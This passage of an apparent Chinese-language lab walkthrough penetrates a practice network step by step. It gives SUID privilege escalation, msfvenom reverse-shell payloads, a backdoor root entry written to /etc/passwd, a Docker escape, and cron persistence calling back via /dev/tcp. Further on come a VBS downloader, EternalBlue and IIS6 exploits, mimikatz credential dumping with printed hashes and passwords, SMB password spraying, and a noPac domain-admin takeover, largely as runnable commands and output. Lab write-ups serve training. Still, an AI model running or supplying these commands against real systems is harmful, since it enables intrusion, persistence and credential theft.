<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">find</span> / -perm -u<span class="token operator">=</span>s -type f <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null
<span class="token function">find</span> <span class="token builtin class-name">.</span> -exec /bin/sh <span class="token punctuation">\</span><span class="token punctuation">;</span> -quit
<span class="token function">find</span> / -user root -perm -4000-print<span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null
<span class="token function">find</span> / -user root -perm -4000-exec <span class="token function">ls</span> -ldb <span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span> <span class="token punctuation">\</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415214553463.png"></p>
<p>搜出来<code>find</code>，然后到<a target="_blank" rel="noopener" href="https://gtfobins.github.io/%E8%BF%99%E9%87%8C%E6%9F%A5%E4%B8%80%E4%B8%8B">https://gtfobins.github.io/这里查一下</a></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415214714231.png"></p>
<p>这里就写了如何利用该文件进行提权的命令。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415214701939.png"></p>
<p>网站给出的是完整的测试命令，平时使用只需要用第二行即可。</p>
<p>那执行个命令试试。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">find</span> <span class="token builtin class-name">.</span> -exec <span class="token function">whoami</span> <span class="token punctuation">\</span><span class="token punctuation">;</span> -quit<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415221528570.png"></p>
<p>可见提权成功，接下来生成个MSF的马。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">msfvenom -p linux/x64/meterpreter/reverse_tcp <span class="token assign-left variable">LHOST</span><span class="token operator">=</span><span class="token number">192.168</span>.110.131 <span class="token assign-left variable">LPORT</span><span class="token operator">=</span><span class="token number">6666</span> -f elf <span class="token operator">></span> shell<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>然后在kali进入<code>msfconsole</code></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">use exploit/multi/handler
<span class="token builtin class-name">set</span> payload linux/x64/meterpreter/reverse_tcp
<span class="token builtin class-name">set</span> lhost <span class="token number">192.168</span>.110.131
<span class="token builtin class-name">set</span> lport <span class="token number">6666</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>再到蚁剑终端里执行shell(将点改为index.php是为了避免弹多个session)</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">find</span> index.php -exec ./shell <span class="token punctuation">\</span><span class="token punctuation">;</span> -quit<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415223140682.png"></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220415224300619.png"></p>
<p>提权成功了，但这种形式的root权限并不完整，最好是创建个root用户。然后就是passwd提权的思路：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">openssl <span class="token function">passwd</span> -1 -salt hack <span class="token number">123456</span> <span class="token comment">#生成$1$hack$.JxSX4bOP1WSqH0kCgs9Y.</span>
<span class="token builtin class-name">echo</span> <span class="token string">'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0:root:/root:/bin/bash'</span> <span class="token operator">>></span>/etc/passwd<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>然后尝试切换用户，但在这里提示<code>su: must be run from a terminal</code>，说明这不是一个可交互终端。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220416194315765.png"></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">python -c <span class="token string">'import pty; pty.spawn("/bin/bash")'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>生成个交互终端，然后切换用户：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220416194422322.png"></p>
<p>然后判断一下是不是在docker环境，看看根目录</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220416191226701.png"></p>
<p>也可以用<code>cat /proc/1/cgroup</code>看是否有docker字符串：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220416174917631.png"></p>
<h3 id="docker逃逸"><a href="#docker逃逸" class="headerlink" title="docker逃逸"></a>docker逃逸</h3><p>接下来进行docker逃逸，目前而言逃逸的办法不多，都得有特定条件，一个一个试过去，不行就弃。</p>
<p>试了半天，特权模式下逃逸可行，猜测<code>docker run</code>时加了<code>--privileged</code></p>
<blockquote>
<p><code>--privileged</code>：Docker将允许容器访问宿主机上的所有设备，同时修改AppArmor或SELinux的配置，使容器拥有与那些直接运行在宿主机上的进程几乎相同的访问权限。</p>
</blockquote>
<p>先<code>fdisk -l</code>看看磁盘文件名称：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220416190824951.png"></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">mkdir</span> <span class="token builtin class-name">test</span>
<span class="token function">mount</span> /dev/sda1 <span class="token builtin class-name">test</span> <span class="token comment">#将宿主机的目录挂载到test目录</span>
<span class="token function">chroot</span> <span class="token builtin class-name">test</span> <span class="token comment">#改变根目录为/test</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>这样就逃逸成功了</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220421144822200.png"></p>
<p>然后再写个反弹shell到定时任务来维持权限：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> <span class="token string">"* * * * * /bin/bash -c '/bin/bash -i >&amp; /dev/tcp/192.168.110.131/4444 0>&amp;1'"</span> <span class="token operator">>></span> /var/spool/cron/crontabs/root
<span class="token builtin class-name">echo</span> <span class="token string">"* * * * * root /bin/bash -c '/bin/bash -i >&amp; /dev/tcp/192.168.110.131/4444 0>&amp;1'"</span> <span class="token operator">>></span> /etc/crontab<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>设定好监听端口和payload：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span> lport <span class="token number">4444</span>
<span class="token builtin class-name">set</span> payload cmd/unix/reverse_bash<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>如果一下弹太多shell容易一下开出多个session，所以定时间隔不要太短。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220427203150311.png"></p>
<p><code>session -i 2</code> 进一个shell看看</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220427203915852.png"></p>
<p>既然没问题，那用<code>sessions -k 3</code>清理掉多余的sessions，再用<code>sessions -u 2</code>尝试升级下shell。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220427210510769.png"></p>
<p>提示报错了，但也显示sessions开启了。查看下sessions 7试试：</p>
<p> <img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220427210641189.png"></p>
<p>看样子并没有什么问题，所以可能是执行的命令没有得到期望的回调才报错，但实际上shell还是执行成功了。</p>
<p>这样就先拿到第一个flag了。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220427220527471.png"></p>
<h2 id="内网横移"><a href="#内网横移" class="headerlink" title="内网横移"></a>内网横移</h2><h3 id="内网扫描"><a href="#内网扫描" class="headerlink" title="内网扫描"></a>内网扫描</h3><p>接下来就是内网篇，首先做个路由转发，用<code>post/multi/manage/autoroute</code>模块。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220429222952571.png"></p>
<p>值得注意的是，设置好路由转发后MSF模块就可以正常使用，但外部的程序(如nmap)还需要设置个代理。</p>
<p>用<code>auxiliary/server/socks_proxy</code>模块开个代理。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220429223410171.png"></p>
<p>默认是<code>socks5://0.0.0.0:1080</code>。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220429223548293.png"></p>
<p>代理启动后就在<code>/etc/proxychains4.conf</code>中加个<code>socks5 127.0.0.1 1080</code>。</p>
<p>然后用nmap扫一下</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">proxychains4 nmap -sS -Pn <span class="token number">192.168</span>.110.0/24 -p <span class="token number">445,80</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>扫出三台机子：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220429235741413.png"></p>
<h3 id="iis6-0溢出"><a href="#iis6-0溢出" class="headerlink" title="iis6.0溢出"></a>iis6.0溢出</h3><p>144和197的445端口都打开了，所以第一反应肯定是掏出永恒之蓝试试。</p>
<p>在msf中用<code>windows/smb/ms17_010_eternalblue</code>模块</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">use windows/smb/ms17_010_eternalblue
<span class="token builtin class-name">set</span> pyaload windows/meterpreter/bind_tcp <span class="token comment">#选择正向shell</span>
<span class="token builtin class-name">set</span> rhosts <span class="token number">192.168</span>.110.197<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220430115831765.png"></p>
<p>可惜利用失败，那么就得找点其他办法。</p>
<p>之前nmap扫出来过<code>192.168.110.144</code>的80端口是开启的，去访问看看。</p>
<p>明显是个ISS页面，</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220430225704513.png"></p>
<p>版本查出来是IIS6.0</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220430225725036.png"></p>
<p>然后随便找个漏洞库一搜，搜到CVE-2017-7269 <strong>IIS 6.0开启Webdav缓存区溢出漏洞</strong></p>
<blockquote>
<p>IIS 6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行，目前针对Windows Server 2003 R2 可以稳定利用。</p>
</blockquote>
<p>粗略的看了一下是可行的，那接下来搜搜有没有现成的POC。</p>
<p>可以在GITHUB、exploit-db或扒漏洞库里的POC，在这里我直接在MSF搜了。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220430231053248.png"></p>
<p>设置好远程主机就可以直接run了。</p>
<p><code>windows/iis/iis_webdav_scstoragepathfromurl</code>这个模块试了很久都不行，搜了下似乎是有问题至今未修复。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221002173318622.png"></p>
<p>github上找了个，扔msf里，成功打入。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20220505215138924.png"></p>
<p>后面就是老套路，写个马便于权限维持。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">msfvenom -p windows/meterpreter/reverse_tcp <span class="token assign-left variable">lhost</span><span class="token operator">=</span>IP <span class="token assign-left variable">lport</span><span class="token operator">=</span><span class="token number">7777</span> -f exe -o s.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>写个vbs下载脚本</p>
<pre class="line-numbers language-cmd" data-language="cmd"><code class="language-cmd">echo set a&#x3D;createobject(^&quot;adod^&quot;+^&quot;b.stream^&quot;):set w&#x3D;createobject(^&quot;micro^&quot;+^&quot;soft.xmlhttp^&quot;):w.open ^&quot;get^&quot;,wsh.arguments( 0),0:w.send:a.type&#x3D;1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 &gt;&gt;download.vbs<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-cmd" data-language="cmd"><code class="language-cmd">cscript downfile.vbs http:&#x2F;&#x2F;IP:8000&#x2F;s.exe s.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>然后再使用<a target="_blank" rel="noopener" href="https://github.com/brianwrf/WinSystemHelper/blob/master/MS09-020-KB970483-CVE-2009-1535-IIS6.rar">MS09-020-KB970483-CVE-2009-1535-IIS6</a>这个提权洞进行提权。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221002213521331.png"></p>
<p>这里发现一些字符有乱码，但是2003又没法用<code>chcp 65001</code></p>
<p>再次使用<code>chcp 10000</code>，转换为UTF16编码，虽然中文是问号，但英文能正常显示了。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004155026400.png"></p>
<p>之后拿下第二个flag：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004154943480.png"></p>
<h3 id="2003信息收集"><a href="#2003信息收集" class="headerlink" title="2003信息收集"></a>2003信息收集</h3><p>在最新的msf版本中<code>load mimikatz</code>已经取消了，所以使用kiwi模块</p>
<blockquote>
<p>kiwi模块同时支持32位和64位的系统，但是该模块默认是加载32位的系统，所以如果目标主机是64位系统的话，直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的，则必须先查看系统进程列表，然后将meterpreter进程迁移到一个64位程序的进程中，才能加载kiwi并且查看系统明文。</p>
</blockquote>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221002222959160.png"></p>
<p>用hashdump查看密码</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221002223152576.png"></p>
<pre class="line-numbers language-none"><code class="language-none">Administrator:500:b7a7f6ace75537edb75e0c8d76954a50:42e2656ec24331269f82160ff5962387:::
ASPNET:1006:c5f4c32e080b1c0a19f45641a62db986:5643281884dd972acd9b0eaeecd13522:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW-79FA760B73D:1000:a1323e561696c32ad68862a8c0118e7e:00dd987a1d0c4540f919b3eb5fc0b1cd:::
IWAM_WWW-79FA760B73D:1001:123dec921ecc0ca82f1106015d8abba7:556f2d1b30d88fc35eb8c4d573a5cd14:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:f739006531fcc09af8615f9575fa943c:::<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>以<code>Administrator:500:b7a7f6ace75537edb75e0c8d76954a50:42e2656ec24331269f82160ff5962387:::</code>为例</p>
<p>Administrator:UID:LM口令哈希:NTLM口令哈希值</p>
<p>尝试解密，成功解出密码为<code>QWEasd123</code>。当然解不出也没关系。后面也可以直接用。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221003000032717.png"></p>
<p>ipconfig，发现有两个网卡。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221002230930495.png"></p>
<p>上传个nbtscan，扫一下</p>
<pre class="line-numbers language-cmd" data-language="cmd"><code class="language-cmd">nbtscan -r 10.10.10.0&#x2F;24<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221002231203887.png"></p>
<p>还是老样子，用<code>post/multi/manage/autoroute</code>模块开个路由转发，这样就能进10.10.10.0&#x2F;24网段了。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221002234726520.png"></p>
<h3 id="smb爆破"><a href="#smb爆破" class="headerlink" title="smb爆破"></a>smb爆破</h3><p>用<code>QWEasd123</code>当密码，使用<code>scanner/smb/smb_login</code>进行批量弱口令测试。</p>
<p>最后发现<strong>WIN7</strong>这台机子用的相同的密码。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221003120443407.png"></p>
<h3 id="PTH"><a href="#PTH" class="headerlink" title="PTH"></a>PTH</h3><p>PTH(pass the hash)，即哈希传递攻击。适用于：</p>
<blockquote>
<ol>
<li>域&#x2F;工作组环境</li>
<li>可拿hash，但无法爆破</li>
<li>内网中存在和当前机器相同的密码</li>
</ol>
</blockquote>
<p>在此使用psexec，psexec的使用有以下几个注意点：</p>
<blockquote>
<ol>
<li>需要远程系统开启<code>admin$</code>共享（默认是开启的）</li>
<li>因为PsExec连接的原理是基于IPC共享，因此目标需要开放445端口</li>
<li>使用<code>IPC$</code>连接目标系统后，再使用psexec无需账户密码</li>
<li>在使用PsExec执行远程命令时，会在目标系统中创建一个psexec的服务，命令执行完后，psexec服务将被自动删除。由于创建或删除服务时会产生大量的日志，因此蓝队在溯源时可以通过日志反推攻击流程</li>
<li>使用PsExec可以直接获得System权限的交互式Shell的前提目标是administrator权限的shell</li>
<li>在域环境测试时发现，非域用户无法利用内存中的票据使用PsExec功能，只能依靠账号和密码进行传递</li>
</ol>
</blockquote>
<p>先尝试常规的psexec模块<code>exploit/windows/smb/psexec</code></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004000711220.png"></p>
<p>显然不行：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004000721877.png"></p>
<p>这个模块没有具体的错误信息，使用impacket包里的试试。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004010317703.png"></p>
<p>显然，不满足常规psexec使用条件。</p>
<p>掏出永恒之蓝，用<code>windows/smb/ms17_010_psexec</code>模块</p>
<pre class="line-numbers language-none"><code class="language-none">set payload windows&#x2F;meterpreter&#x2F;bind_tcp
set smbuser WIN7
set smbpass QWEasd123
set rhosts 10.10.10.142<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004001349962.png"></p>
<p>成功拿下</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004001543703.png"></p>
<h3 id="WIN7信息收集"><a href="#WIN7信息收集" class="headerlink" title="WIN7信息收集"></a>WIN7信息收集</h3><p>老样子，用kiwi收集下信息</p>
<pre class="line-numbers language-none"><code class="language-none">load kiwi
kiwi_cmd sekurlsa::logonPasswords<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>在加载的时候有个提示：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004013148785.png"></p>
<p>想读取哈希也不行。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004013201278.png"></p>
<p>前文有讲过：</p>
<blockquote>
<p>kiwi模块同时支持32位和64位的系统，但是该模块默认是加载32位的系统，所以如果目标主机是64位系统的话，直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的，则必须先查看系统进程列表，然后将meterpreter进程迁移到一个64位程序的进程中，才能加载kiwi并且查看系统明文。</p>
</blockquote>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004013035029.png"></p>
<p>所以，需要迁移一下进程。</p>
<p>在此使用自动迁移是行不通的，需要手动一下。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004013336900.png"></p>
<p>ps查看进程，随便选一个，比如396。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004013508503.png"></p>
<p>然后<code>migrate 396</code>，迁移成功：</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004013528358.png"></p>
<p>此时再读取一下哈希，加载成功。</p>
<p>这里就显示出了域用户test的明文密码。注意，如果该用户没有登录过，就不会有明文出现。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004151300971.png"></p>
<p>同样hashdump一下：</p>
<pre class="line-numbers language-none"><code class="language-none">Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
win7:1000:aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387:::<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>之后想进shell，发现报错</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004015159581.png"></p>
<p>想到可能是迁移的进程不太好，于是重新迁移了下。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004015242004.png"></p>
<p>这里字符乱码，使用<code>chcp 65001</code>修改cmd编码即可。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004015404338.png"></p>
<p>拿下第三个flag</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004152408156.png"></p>
<h3 id="攻击域控"><a href="#攻击域控" class="headerlink" title="攻击域控"></a>攻击域控</h3><p>使用<code>net group &quot;domain controllers&quot; /domain</code>查下域控，发现有两个：<code>ad01$</code>和<code>ad02$</code></p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004164050682.png"></p>
<p>再查主域控，在域环境中，主域控制器会同时被用作时间服务器，所以使用<code>net time /domain</code>查询</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004164254530.png"></p>
<p>经过一番尝试，最后发现<strong>CVE-2021-42278&#x2F;CVE-2021-42287</strong>可行，可以十分方便的将域普通用户提权到域管理用户。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/Ridter/noPac">https://github.com/Ridter/noPac</a></p>
<pre class="line-numbers language-none"><code class="language-none">proxychains4 python scanner.py nasa.gov&#x2F;test:&#39;QWEasd!@#999&#39; -dc-ip 10.10.10.140<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>看来可行</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004175303814.png"></p>
<pre class="line-numbers language-none"><code class="language-none">proxychains4 python noPac.py nasa.gov&#x2F;test:&#39;QWEasd!@#999&#39; -dc-ip 10.10.10.140 -dc-host AD01 -shell --impersonate administrator<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004175452389.png"></p>
<pre class="line-numbers language-none"><code class="language-none">[*] Current ms-DS-MachineAccountQuota &#x3D; 10
[*] Selected Target AD01.nasa.gov
[*] will try to impersonat administrator
[*] Adding Computer Account &quot;WIN-T6MSDOGTNXQ$&quot;
[*] MachineAccount &quot;WIN-T6MSDOGTNXQ$&quot; password &#x3D; NJul1c8qv)XE
[*] Successfully added machine account WIN-T6MSDOGTNXQ$ with password NJul1c8qv)XE.
[*] WIN-T6MSDOGTNXQ$ object &#x3D; CN&#x3D;WIN-T6MSDOGTNXQ,CN&#x3D;Computers,DC&#x3D;nasa,DC&#x3D;gov
[*] WIN-T6MSDOGTNXQ$ sAMAccountName &#x3D;&#x3D; AD01
[*] Saving ticket in AD01.ccache
[*] Resting the machine account to WIN-T6MSDOGTNXQ$
[*] Restored WIN-T6MSDOGTNXQ$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*]     Requesting S4U2self
[*] Saving ticket in administrator.ccache
[*] Remove ccache of AD01.nasa.gov
[*] Rename ccache with target ...
[*] Attempting to del a computer with the name: WIN-T6MSDOGTNXQ$
[-] Delete computer WIN-T6MSDOGTNXQ$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>反弹了个shell，成功获得权限。</p>
<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004175628888.png"></p>
<p>再使用该脚本hashdump一下：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">proxychains4 python noPac.py nasa.gov/test:<span class="token string">'QWEasd!@#999'</span> -dc-ip <span class="token number">10.10</span>.10.140 -dc-host AD01 --impersonate administrator -dump<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004182826142.png"></p>
<p>使用以下命令可以只导出Administrator的哈希，在这里不能写成nasa.gov&#x2F;Administrator，虽然脚本这么显示。</p>
<pre class="line-numbers language-none"><code class="language-none">proxychains4 python noPac.py nasa.gov&#x2F;test:&#39;QWEasd!@#999&#39; -dc-ip 10.10.10.140 -dc-host AD01 --impersonate administrator -dump -just-dc-user Administrator<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="../images/NASA%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F%E9%A1%B9%E7%9B%AE%E4%B8%80/image-20221004183253639.png"></p>
